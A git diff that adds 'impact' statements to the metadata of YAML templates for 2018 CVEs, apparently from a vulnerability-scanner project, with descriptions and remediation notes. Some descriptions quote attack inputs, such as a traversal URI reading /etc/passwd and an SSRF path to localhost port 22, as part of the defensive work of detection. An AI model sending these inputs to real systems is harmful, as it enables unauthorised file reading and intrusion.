@@ -6,6 +6,8 @@ info: severity: medium description: | Apache Tomcat versions prior to 9.0.12, 8.5.34, and 7.0.91 are prone to an open-redirection vulnerability because it fails to properly sanitize user-supplied input. + impact: | + An attacker can redirect users to malicious websites, leading to phishing attacks or the download of malware. remediation: | Upgrade to Apache Tomcat version 9.0.12 or later, or apply the relevant patch provided by the Apache Software Foundation. reference: diff --git a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml index 5ad0f2efe6..5a8904a9bc 100644 --- a/http/cves/2018/CVE-2018-12031.yaml +++ b/http/cves/2018/CVE-2018-12031.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: Eaton Intelligent Power Manager v1.6 allows an attacker to include a file via directory traversal, which can lead to sensitive information disclosure, denial of service and code execution. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system. remediation: | Apply the latest security patch or upgrade to a newer version of Eaton Intelligent Power Manager to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-12054.yaml b/http/cves/2018/CVE-2018-12054.yaml index d27be094e2..ed155d0a58 100644 --- a/http/cves/2018/CVE-2018-12054.yaml +++ b/http/cves/2018/CVE-2018-12054.yaml 
@@ -5,6 +5,8 @@ info: author: wisnupramoedya severity: high description: Schools Alert Management Script is susceptible to an arbitrary file read vulnerability via the f parameter in img.php, aka absolute path traversal. + impact: | + This vulnerability can lead to unauthorized access to sensitive information stored on the system, potentially exposing personal data of students, staff, and other stakeholders. remediation: | Apply the latest patch or update provided by the vendor to fix the arbitrary file read vulnerability in the Schools Alert Management Script. reference: diff --git a/http/cves/2018/CVE-2018-1207.yaml b/http/cves/2018/CVE-2018-1207.yaml index e7a0400c5f..86a8b5ec4d 100644 --- a/http/cves/2018/CVE-2018-1207.yaml +++ b/http/cves/2018/CVE-2018-1207.yaml @@ -8,6 +8,8 @@ info: Dell EMC iDRAC7/iDRAC8, versions prior to 2.52.52.52, contain a CGI injection vulnerability which could be used to execute remote code. A remote unauthenticated attacker may potentially be able to use CGI variables to execute remote code. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device. remediation: | Apply the latest firmware updates provided by Dell to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-12095.yaml b/http/cves/2018/CVE-2018-12095.yaml index 4351fa57e1..d43f258ce8 100644 --- a/http/cves/2018/CVE-2018-12095.yaml +++ b/http/cves/2018/CVE-2018-12095.yaml 
@@ -5,6 +5,8 @@ info: author: LogicalHunter severity: medium description: OEcms 3.1 is vulnerable to reflected cross-site scripting via the mod parameter of info.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest patch or upgrade to a newer version of OEcms to fix the XSS vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml index 89a2a6a0e5..d69e62f154 100644 --- a/http/cves/2018/CVE-2018-12296.yaml +++ b/http/cves/2018/CVE-2018-12296.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: high description: Seagate NAS OS version 4.3.15.1 has insufficient access control which allows attackers to obtain information about the NAS without authentication via empty POST requests in /api/external/7.0/system.System.get_infos. + impact: | + An attacker can gain sensitive information about the server, potentially leading to further attacks. remediation: | Upgrade to a patched version of Seagate NAS OS. reference: diff --git a/http/cves/2018/CVE-2018-12300.yaml b/http/cves/2018/CVE-2018-12300.yaml index 0b072cd49a..88c0a90649 100644 --- a/http/cves/2018/CVE-2018-12300.yaml +++ b/http/cves/2018/CVE-2018-12300.yaml 
@@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Seagate NAS OS 4.3.15.1 contains an open redirect vulnerability in echo-server.html, which can allow an attacker to disclose information in the referer header via the state URL parameter. + impact: | + Successful exploitation of this vulnerability could lead to user redirection to malicious websites, potentially resulting in the theft of sensitive information or the installation of malware. remediation: | Apply the latest security patches or updates provided by Seagate to fix the open redirect vulnerability in NAS OS 4.3.15.1. reference: diff --git a/http/cves/2018/CVE-2018-12613.yaml b/http/cves/2018/CVE-2018-12613.yaml index 9977d721cf..eae876d2b2 100644 --- a/http/cves/2018/CVE-2018-12613.yaml +++ b/http/cves/2018/CVE-2018-12613.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: PhpMyAdmin before version 4.8.2 is susceptible to local file inclusion that allows an attacker to include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication). + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server. remediation: | Upgrade PhpMyAdmin to version 4.8.2 or later to fix the vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-12634.yaml b/http/cves/2018/CVE-2018-12634.yaml index 9a7407fd1c..3327f36bf5 100644 --- a/http/cves/2018/CVE-2018-12634.yaml +++ b/http/cves/2018/CVE-2018-12634.yaml 
@@ -5,6 +5,8 @@ info: author: geeknik severity: critical description: CirCarLife Scada before 4.3 allows remote attackers to obtain sensitive information via a direct request for the html/log or services/system/info.html URI. CirCarLife is an internet-connected electric vehicle charging station. + impact: | + An attacker can gain access to sensitive system logs, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade CirCarLife Scada to version 4.3 or above to fix the system log exposure vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-12675.yaml b/http/cves/2018/CVE-2018-12675.yaml index 63f0ae2ffc..03146520b7 100644 --- a/http/cves/2018/CVE-2018-12675.yaml +++ b/http/cves/2018/CVE-2018-12675.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | SV3C HD Camera L Series 2.3.4.2103-S50-NTD-B20170508B and 2.3.4.2103-S50-NTD-B20170823B contains an open redirect vulnerability. It does not perform origin checks on URLs in the camera's web interface, which can be leveraged to send a user to an unexpected endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can use this vulnerability to redirect users to malicious websites, leading to phishing attacks. remediation: | Apply the latest firmware update provided by the vendor to fix the open redirect vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-1271.yaml b/http/cves/2018/CVE-2018-1271.yaml index aeb370861b..b3cc02176c 100644 --- a/http/cves/2018/CVE-2018-1271.yaml +++ b/http/cves/2018/CVE-2018-1271.yaml 
@@ -5,6 +5,8 @@ info: author: hetroublemakr severity: medium description: Spring MVC Framework versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported are vulnerable to local file inclusion because they allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). A malicious user can send a request using a specially crafted URL that can lead a directory traversal attack. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest security patches and updates provided by the Spring MVC Framework to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-1273.yaml b/http/cves/2018/CVE-2018-1273.yaml index 9b03d71764..708e03785a 100644 --- a/http/cves/2018/CVE-2018-1273.yaml +++ b/http/cves/2018/CVE-2018-1273.yaml @@ -11,6 +11,8 @@ info: An unauthenticated remote malicious user (or attacker) can supply specially crafted request parameters against Spring Data REST backed HTTP resources or using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack. + impact: | + Successful exploitation of this vulnerability could lead to remote code execution, allowing an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches provided by the vendor to fix the deserialization vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-12998.yaml b/http/cves/2018/CVE-2018-12998.yaml index 447f26b5d3..5bdf988ca4 100644 --- a/http/cves/2018/CVE-2018-12998.yaml +++ b/http/cves/2018/CVE-2018-12998.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Zoho manageengine is vulnerable to reflected cross-site scripting. This impacts Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patch or update provided by Zoho ManageEngine to fix the XSS vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-1335.yaml b/http/cves/2018/CVE-2018-1335.yaml index 6ad8f9c683..c59a4ccf62 100644 --- a/http/cves/2018/CVE-2018-1335.yaml +++ b/http/cves/2018/CVE-2018-1335.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: Apache Tika versions 1.7 to 1.17 allow clients to send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected server. remediation: Upgrade to Tika 1.18. reference: - https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/ diff --git a/http/cves/2018/CVE-2018-13379.yaml b/http/cves/2018/CVE-2018-13379.yaml index 85a76a35fd..2593e07e50 100644 --- a/http/cves/2018/CVE-2018-13379.yaml +++ b/http/cves/2018/CVE-2018-13379.yaml 
@@ -5,6 +5,8 @@ info: author: organiccrap severity: critical description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due to improper limitation of a pathname to a restricted directory (path traversal). + impact: | + An attacker can obtain sensitive information such as usernames and passwords. remediation: | Apply the necessary patches or updates provided by Fortinet to fix the vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-13380.yaml b/http/cves/2018/CVE-2018-13380.yaml index e4cdcbddbb..18b0497d1e 100644 --- a/http/cves/2018/CVE-2018-13380.yaml +++ b/http/cves/2018/CVE-2018-13380.yaml @@ -5,6 +5,8 @@ info: author: shelld3v,AaronChen0 severity: medium description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal are vulnerable to cross-site scripting and allows attacker to execute unauthorized malicious script code via the error or message handling parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by Fortinet to fix this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-13980.yaml b/http/cves/2018/CVE-2018-13980.yaml index b6835c8640..9c6e9b8f12 100644 --- a/http/cves/2018/CVE-2018-13980.yaml +++ b/http/cves/2018/CVE-2018-13980.yaml 
@@ -5,6 +5,8 @@ info: author: wisnupramoedya severity: medium description: Zeta Producer Desktop CMS before 14.2.1 is vulnerable to local file inclusion if the plugin "filebrowser" is installed because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. remediation: | Upgrade Zeta Producer Desktop CMS to version 14.2.1 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml index 210ceed65d..4f99e29ec0 100644 --- a/http/cves/2018/CVE-2018-14013.yaml +++ b/http/cves/2018/CVE-2018-14013.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 is vulnerable to cross-site scripting via the AJAX and html web clients. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a version of Synacor Zimbra Collaboration Suite Collaboration that is equal to or greater than 8.8.11 to mitigate the vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-14474.yaml b/http/cves/2018/CVE-2018-14474.yaml index 63e99199dd..7ddc86441c 100644 --- a/http/cves/2018/CVE-2018-14474.yaml +++ b/http/cves/2018/CVE-2018-14474.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Orange Forum 1.4.0 contains an open redirect vulnerability in views/auth.go via the next parameter to /login or /signup. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. remediation: | Upgrade to a patched version of Orange Forum or apply the necessary security patches to fix the open redirect vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-14574.yaml b/http/cves/2018/CVE-2018-14574.yaml index 704253a006..b0bf5d5b63 100644 --- a/http/cves/2018/CVE-2018-14574.yaml +++ b/http/cves/2018/CVE-2018-14574.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Django 1.11.x before 1.11.15 and 2.0.x before 2.0.8 contains an open redirect vulnerability. If django.middleware.common.CommonMiddleware and APPEND_SLASH settings are selected, and if the project has a URL pattern that accepts any path ending in a slash, an attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can craft a malicious URL that redirects users to a malicious website, leading to potential phishing attacks or the exploitation of other vulnerabilities. remediation: | Upgrade to the latest version of Django or apply the relevant patch provided by the Django project. reference: diff --git a/http/cves/2018/CVE-2018-14728.yaml b/http/cves/2018/CVE-2018-14728.yaml index 18e6612bb3..31ee508544 100644 --- a/http/cves/2018/CVE-2018-14728.yaml +++ b/http/cves/2018/CVE-2018-14728.yaml 
@@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: Responsive filemanager 9.13.1 is susceptible to server-side request forgery in upload.php via the url parameter. + impact: | + An attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks. remediation: | Upgrade to a patched version of Responsive Filemanager or apply the necessary security patches to mitigate the SSRF vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-14916.yaml b/http/cves/2018/CVE-2018-14916.yaml index e759bdd5eb..3b6dd92827 100644 --- a/http/cves/2018/CVE-2018-14916.yaml +++ b/http/cves/2018/CVE-2018-14916.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: critical description: Loytec LGATE-902 versions prior to 6.4.2 suffers from a local file inclusion vulnerability. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the device. remediation: | Upgrade the Loytec LGATE-902 device to version 6.4.2 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml index 9d564a9950..e463f47d21 100644 --- a/http/cves/2018/CVE-2018-14918.yaml +++ b/http/cves/2018/CVE-2018-14918.yaml @@ -6,6 +6,8 @@ info: severity: high description: | LOYTEC LGATE-902 6.3.2 is susceptible to local file inclusion which could allow an attacker to manipulate path references and access files and directories (including critical system files) that are stored outside the root folder of the web application running on the device. This can be used to read and configuration files containing, e.g., usernames and passwords. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the device, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest firmware update provided by LOYTEC to fix the LFI vulnerability. reference: 
diff --git a/http/cves/2018/CVE-2018-14931.yaml b/http/cves/2018/CVE-2018-14931.yaml index ef5ed3aff6..d45a487ef2 100644 --- a/http/cves/2018/CVE-2018-14931.yaml +++ b/http/cves/2018/CVE-2018-14931.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Polarisft Intellect Core Banking Software Version 9.7.1 is susceptible to an open redirect issue in the Core and Portal modules via the /IntellectMain.jsp?IntellectSystem= URI. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. remediation: | Apply the latest security patches or updates provided by Polarisft to fix the open redirect vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-15138.yaml b/http/cves/2018/CVE-2018-15138.yaml index cda46e7922..84a7a4274c 100644 --- a/http/cves/2018/CVE-2018-15138.yaml +++ b/http/cves/2018/CVE-2018-15138.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Ericsson-LG iPECS NMS 30M allows local file inclusion via ipecs-cm/download?filename=../ URIs. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the target system, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml index 6adc88d65d..9d84641817 100644 --- a/http/cves/2018/CVE-2018-15517.yaml +++ b/http/cves/2018/CVE-2018-15517.yaml 
@@ -5,6 +5,8 @@ info: author: gy741 severity: high description: D-Link Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using a browser. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to internal resources, data leakage, and potential compromise of the entire network. remediation: | Apply the latest security patches or updates provided by D-Link to fix the SSRF vulnerability in Central WifiManager. reference: diff --git a/http/cves/2018/CVE-2018-15535.yaml b/http/cves/2018/CVE-2018-15535.yaml index 8092a8a652..eff101d0de 100644 --- a/http/cves/2018/CVE-2018-15535.yaml +++ b/http/cves/2018/CVE-2018-15535.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Responsive FileManager before version 9.13.4 is vulnerable to local file inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory, aka local file inclusion. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade to Responsive FileManager version 9.13.4 or later to fix the vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-15745.yaml b/http/cves/2018/CVE-2018-15745.yaml index b738c9d90d..cbb29057f0 100644 --- a/http/cves/2018/CVE-2018-15745.yaml +++ b/http/cves/2018/CVE-2018-15745.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Argus Surveillance DVR 4.0.0.0 devices allow unauthenticated local file inclusion, leading to file disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server. remediation: | Upgrade to a patched version of Argus Surveillance DVR. reference: diff --git a/http/cves/2018/CVE-2018-15961.yaml b/http/cves/2018/CVE-2018-15961.yaml index b82515d5bc..c6763c3442 100644 --- a/http/cves/2018/CVE-2018-15961.yaml +++ b/http/cves/2018/CVE-2018-15961.yaml @@ -5,6 +5,8 @@ info: author: SkyLark-Lab,ImNightmaree severity: critical description: Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution. + impact: | + Successful exploitation of this vulnerability can result in remote code execution, allowing an attacker to take control of the affected system. remediation: | Apply the necessary security patches or updates provided by Adobe to fix this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-16059.yaml b/http/cves/2018/CVE-2018-16059.yaml index c6f6b581f8..90fcebc46d 100644 --- a/http/cves/2018/CVE-2018-16059.yaml +++ b/http/cves/2018/CVE-2018-16059.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WirelessHART Fieldgate SWG70 3.0 is vulnerable to local file inclusion via the fcgi-bin/wgsetcgi filename parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the system, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in WirelessHART Fieldgate SWG70 3.0. reference: 
diff --git a/http/cves/2018/CVE-2018-16133.yaml b/http/cves/2018/CVE-2018-16133.yaml index ed4212df54..71fdaebba3 100644 --- a/http/cves/2018/CVE-2018-16133.yaml +++ b/http/cves/2018/CVE-2018-16133.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Cybrotech CyBroHttpServer 1.0.3 is vulnerable to local file inclusion in the URI. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system. remediation: | Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Cybrotech CyBroHttpServer 1.0.3. reference: diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml index 1dafd59203..75ed819aaf 100644 --- a/http/cves/2018/CVE-2018-16139.yaml +++ b/http/cves/2018/CVE-2018-16139.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | BIBLIOsoft BIBLIOpac 2008 contains a cross-site scripting vulnerability via the db or action parameter to bin/wxis.exe/bibliopac/, which allows a remote attacker to inject arbitrary web script or HTML. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest patch or upgrade to a newer version of BIBLIOsoft BIBLIOpac 2008 that addresses the XSS vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index 0d300d243b..ddc562e84e 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Gift Vouchers plugin before 4.1.8 contains a blind SQL injection vulnerability via the template_id parameter in a wp-admin/admin-ajax.php wpgv_doajax_front_template request. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. remediation: Fixed in version 4.1.8. reference: - https://wpscan.com/vulnerability/9117 diff --git a/http/cves/2018/CVE-2018-16167.yaml b/http/cves/2018/CVE-2018-16167.yaml index ec49c9528f..cb3c7f8a9e 100644 --- a/http/cves/2018/CVE-2018-16167.yaml +++ b/http/cves/2018/CVE-2018-16167.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system. remediation: | Upgrade LogonTracer to a version higher than 1.2.0. reference: diff --git a/http/cves/2018/CVE-2018-16288.yaml b/http/cves/2018/CVE-2018-16288.yaml index 536beb3d25..16e7f72d77 100644 --- a/http/cves/2018/CVE-2018-16288.yaml +++ b/http/cves/2018/CVE-2018-16288.yaml @@ -6,6 +6,8 @@ info: severity: high description: | LG SuperSign CMS 2.5 allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs - aka local file inclusion. + impact: | + An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks. remediation: | Apply the latest security patches or upgrade to a patched version of LG SuperSign EZ CMS. reference: diff --git a/http/cves/2018/CVE-2018-16299.yaml b/http/cves/2018/CVE-2018-16299.yaml index 23ed6e3846..71ebbc9e50 100644 
--- a/http/cves/2018/CVE-2018-16299.yaml +++ b/http/cves/2018/CVE-2018-16299.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Localize My Post 1.0 is susceptible to local file inclusion via the ajax/include.php file parameter. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server. remediation: | Update to the latest version of WordPress Localize My Post plugin. reference: diff --git a/http/cves/2018/CVE-2018-16341.yaml b/http/cves/2018/CVE-2018-16341.yaml index b6b3cbd0b0..3e64a3d867 100644 --- a/http/cves/2018/CVE-2018-16341.yaml +++ b/http/cves/2018/CVE-2018-16341.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Nuxeo prior to version 10.3 is susceptible to an unauthenticated remote code execution vulnerability via server-side template injection. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade Nuxeo to version 10.3 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-16668.yaml b/http/cves/2018/CVE-2018-16668.yaml index d198453e33..63981f37e1 100644 --- a/http/cves/2018/CVE-2018-16668.yaml +++ b/http/cves/2018/CVE-2018-16668.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: CirCarLife before 4.3 is susceptible to improper authentication. An internal installation path disclosure exists due to the lack of authentication for /html/repository.System. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data, compromising the confidentiality and integrity of the system. remediation: | Upgrade CirCarLife to version 4.3 or higher to fix the improper authentication issue. reference: 
diff --git a/http/cves/2018/CVE-2018-16671.yaml b/http/cves/2018/CVE-2018-16671.yaml index 5c9a696164..0bda928788 100644 --- a/http/cves/2018/CVE-2018-16671.yaml +++ b/http/cves/2018/CVE-2018-16671.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: CirCarLife before 4.3 is susceptible to improper authentication. A system software information disclosure exists due to lack of authentication for /html/device-id. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data, compromising the confidentiality and integrity of the system. remediation: | Upgrade CirCarLife to version 4.3 or higher to fix the improper authentication issue. reference: diff --git a/http/cves/2018/CVE-2018-16716.yaml b/http/cves/2018/CVE-2018-16716.yaml index c8e93a6aa6..0edfb42b3b 100644 --- a/http/cves/2018/CVE-2018-16716.yaml +++ b/http/cves/2018/CVE-2018-16716.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: critical description: NCBI ToolBox 2.0.7 through 2.2.26 legacy versions contain a path traversal vulnerability via viewcgi.cgi which may result in reading of arbitrary files (i.e., significant information disclosure) or file deletion via the nph-viewgif.cgi query string. + impact: | + An attacker can view, modify, or delete sensitive files on the server, potentially leading to unauthorized access, data leakage, or system compromise. remediation: | Apply the latest patch or update from the vendor to fix the directory traversal vulnerability in the NCBI ToolBox. reference: diff --git a/http/cves/2018/CVE-2018-16761.yaml b/http/cves/2018/CVE-2018-16761.yaml index 4cb92526c4..52fe71b95b 100644 --- a/http/cves/2018/CVE-2018-16761.yaml +++ b/http/cves/2018/CVE-2018-16761.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Eventum before 3.4.0 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. remediation: | Upgrade to Eventum version 3.4.0 or later to fix the open redirect vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-16763.yaml b/http/cves/2018/CVE-2018-16763.yaml index d275a79199..e49cdf06c6 100644 --- a/http/cves/2018/CVE-2018-16763.yaml +++ b/http/cves/2018/CVE-2018-16763.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system, leading to complete compromise of the application and potentially the underlying server. remediation: | Upgrade to FUEL CMS version 1.4.2 or later, which includes a patch for this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-16836.yaml b/http/cves/2018/CVE-2018-16836.yaml index d0c62d77eb..f56dcb1682 100644 --- a/http/cves/2018/CVE-2018-16836.yaml +++ b/http/cves/2018/CVE-2018-16836.yaml 
@@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: critical description: Rubedo CMS through 3.4.0 contains a directory traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server. remediation: | Upgrade to a patched version of Rubedo CMS (>=3.4.1) or apply the provided security patch. reference: diff --git a/http/cves/2018/CVE-2018-16979.yaml b/http/cves/2018/CVE-2018-16979.yaml index e1101ed28a..a4def259ad 100644 --- a/http/cves/2018/CVE-2018-16979.yaml +++ b/http/cves/2018/CVE-2018-16979.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Monstra CMS 3.0.4 is susceptible to HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter. An attacker can potentially supply invalid input and cause the server to allow redirects to attacker-controlled domains, perform cache poisoning, and/or allow improper access to virtual hosts not intended for this purpose. This is a related issue to CVE-2012-2943. + impact: | + This vulnerability can lead to various attacks such as session hijacking, cross-site scripting (XSS), and remote code execution (RCE). remediation: | Upgrade Monstra CMS to version 3.0.5 or later to mitigate the HTTP Header Injection vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-17153.yaml b/http/cves/2018/CVE-2018-17153.yaml index 59ca6b8d56..6bb07032bd 100644 --- a/http/cves/2018/CVE-2018-17153.yaml +++ b/http/cves/2018/CVE-2018-17153.yaml 
